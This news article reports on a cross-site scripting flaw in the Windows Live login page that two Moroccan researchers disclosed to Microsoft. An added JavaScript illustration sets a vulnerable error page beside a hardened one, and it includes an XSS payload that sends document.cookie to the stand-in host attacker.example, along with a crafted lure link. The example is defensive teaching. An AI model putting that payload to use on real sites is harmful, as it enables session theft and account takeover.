
Microsoft patches Windows Live identity theft flaw

Microsoft recently fixed an XSS flaw in its Windows Live service that allowed an attacker to steal victims' online identities. The vulnerability was disclosed by two security researchers from Morocco.
Written by Emil Protalinski, Contributor on

21-year-old Abdeljalil S'hit and 23-year-old Yasser Aboukir recently discovered a serious vulnerability in Microsoft's Windows Live service. The two young security researchers from Morocco responsibly reported it to the software giant even though the company does not provide any compensation for doing so.

The vulnerability in question was a Cross-Site Scripting (XSS) flaw. More specifically, the two researchers were able to trigger an error on the Windows Live login page (shown in a screenshot accompanying the original article), and once the victim clicked the "Continue" button, the attacker's script would execute in the victim's browser, in the context of the Windows Live site.

Because the script ran in the context of the Windows Live site, it could read the victim's cookies, including the session cookies that identify a signed-in user, so an attacker could impersonate that user. Combined with social engineering (getting the victim to open a crafted link to the login page), this technique could be used to steal a victim's Windows Live identity with ease. Aboukir informed me that the vulnerability was rated "critical" by the Microsoft Security Response Center (MSRC).
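The article does not publish the exact defect, so the following is an added illustration, not Microsoft's code or the researchers' payload, of the general pattern described above: a login error page that reflects an attacker-controlled parameter into the HTML unescaped, next to a hardened version that encodes it on output. The host names, the query parameter name `err`, the function names and the sample cookie are all constructed for this example. The cookie attributes at the end show the defence-in-depth point a practitioner would want: with `HttpOnly` set, `document.cookie` cannot read the session cookie even if an XSS does slip through.

```javascript
// Added example (not from the original article): reflected XSS on a login
// error page, the vulnerable render beside the hardened one, and the cookie
// attributes that limit the damage. All names and hosts are constructed.

// Minimal HTML output encoder for text placed inside an element body.
const escapeHtml = (s) =>
  String(s).replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));

// Vulnerable: the error text taken from the query string is concatenated
// straight into the page, so any markup inside it becomes live HTML.
function renderLoginErrorVulnerable(query) {
  const msg = query.get('err') || 'Sign-in failed';
  return `<form action="/login" method="post">
  <p class="error">${msg}</p>
  <button type="submit">Continue</button>
</form>`;
}

// Hardened: identical page, but the untrusted value is encoded on output.
function renderLoginErrorHardened(query) {
  const msg = query.get('err') || 'Sign-in failed';
  return `<form action="/login" method="post">
  <p class="error">${escapeHtml(msg)}</p>
  <button type="submit">Continue</button>
</form>`;
}

// Cookie-theft payload of the kind an attacker plants in a link sent to the
// victim: it ships document.cookie to a host the attacker controls (hypothetical).
const payload =
  `<img src=x onerror="new Image().src='https://attacker.example/c?'+encodeURIComponent(document.cookie)">`;

// Constructed link the victim would be lured into opening.
const maliciousUrl = new URL(
  'https://login.example.test/login?err=' + encodeURIComponent(payload));

// Check whether the rendered page contains the payload as active markup
// (an <img> tag with an onerror handler) rather than as inert text.
function containsActiveMarkup(html) {
  return /<img\b[^>]*onerror=/i.test(html);
}

// Session cookie attributes that blunt cookie theft even when an XSS exists:
// HttpOnly hides it from script, Secure and SameSite limit where it is sent.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Run both renderers against the same malicious query and report the outcome.
function demo() {
  const q = maliciousUrl.searchParams;
  return {
    vulnerableExecutes: containsActiveMarkup(renderLoginErrorVulnerable(q)),
    hardenedExecutes: containsActiveMarkup(renderLoginErrorHardened(q)),
    cookie: sessionCookieHeader('session', 'abc123'),
  };
}

console.log(demo());
```

Running the block prints `vulnerableExecutes: true` and `hardenedExecutes: false`: the same query string that turns into a working `onerror` handler in the vulnerable page is rendered as inert text by the hardened one. Output encoding is the fix for the flaw itself; `HttpOnly` on the session cookie is the second layer that stops a future XSS from turning into account takeover.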

While the MSRC was internally investigating the issue, the two young men were asked to respect Microsoft's coordinated vulnerability disclosure guidelines and not report the issue publicly until it could be addressed. Apparently, it took Microsoft three months to come up with a patch.

"We have created a code change to address the issue and are now testing the changes," a Microsoft spokesperson told the duo. "Because changes to the site may affect a large number of users the testing requirements prior to production release are lengthy. Based on the testing schedule and barring any significant regressions the team expects to release an update into production in early May."

Aboukir tells me, however, that the issue was not completely resolved until mid-June. Now that it has been, he felt comfortable sharing his story with me. He also noted: "You are the first to be contacted about this issue. This 0day was fixed according to responsible disclosure ethics and was not communicated for any third party."

Aboukir describes himself as "a fresh graduated engineer specialized on information security." He described his friend as a "Computer Science engineering student." Both have been featured on Microsoft's list of June 2012 Security Researchers for properly disclosing a valid flaw to Redmond. There is no doubt in my mind that the two have a bright future ahead of them.

As for the issue at hand, I have contacted Microsoft for a statement and will update you if I hear back.

Update at 11:00PM PST - "We quickly addressed the vulnerability in question to help keep customers protected and appreciate the researchers using Coordinated Vulnerability Disclosure to assist in us working toward a fix in a coordinated manner," a Microsoft spokesperson said in a statement.
